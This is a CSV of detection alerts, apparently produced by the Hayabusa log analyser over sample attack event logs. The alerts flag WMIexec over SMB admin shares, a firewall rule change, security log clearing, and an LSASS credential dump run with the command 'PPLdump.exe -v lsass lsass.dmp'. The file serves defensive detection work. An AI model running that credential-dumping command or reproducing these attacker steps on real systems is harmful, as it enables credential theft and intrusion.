2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PPLdump.exe -v lsass lsass.dmp | Process: C:\Users\IEUser\Desktop\PPLdump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xbce3a | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:25.417 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:25.418 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:25.427 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1400 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 592 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010885D0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PPLdump.exe -v lsass lsass.dmp | LID: 0x3e7 | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.083 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x103801 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.084 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.dmp | Process: C:\Windows\system32\services.exe | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.307 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\PPLdump.exe | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:27.649 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 424 | Src PGUID: 747F3D96-6E19-6082-0000-0010A5530000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:27.653 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.260 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\lsass.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 652 | Src PGUID: 747F3D96-6E19-6082-0000-001070650000 | Tgt PID: 624 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010F6600000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 6644 | PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 624 | Src PGUID: 747F3D96-6E19-6082-0000-0010F6600000 | Tgt PID: 6644 | Tgt PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 19:09:46.214 +09:00,srvdefender01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:10:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x3cc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
